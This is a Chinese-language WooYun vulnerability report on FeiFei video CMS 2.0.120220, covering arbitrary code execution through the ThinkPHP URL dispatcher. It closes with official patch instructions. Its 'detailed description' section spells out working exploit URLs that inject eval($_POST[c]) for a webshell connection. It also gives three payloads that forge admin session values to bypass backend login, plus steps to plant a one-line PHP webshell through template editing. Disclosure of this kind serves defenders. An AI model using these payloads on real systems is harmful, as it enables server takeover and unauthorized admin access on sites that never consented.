当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010518

漏洞标题:飞飞影视系统 2.0.120220(Beta4)版 thinkphp任意代码执行漏洞利用

相关厂商:飞飞电影程序v2.0

漏洞作者: 小猪。

提交时间:2012-08-03 11:46

修复时间:2012-09-17 11:46

公开时间:2012-09-17 11:46

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看了乌云的Thinkphp 任意执行,测试下了,飞飞最新版本的。飞飞影视系统 2.0.120220(Beta4)版,说一下利用方法。

详细说明:

第一个方法 直接执行
http://www.testtest.com/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。


第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html

index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html

index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html

执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top
index.php?s=Admin-Index-Top
s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default

拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。

漏洞证明:


修复方案:

该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。
影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
下载地址:http://thinkphp.cn/download-116.html
修正方法:
首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件
3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件

版权声明:转载请注明来源 小猪。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝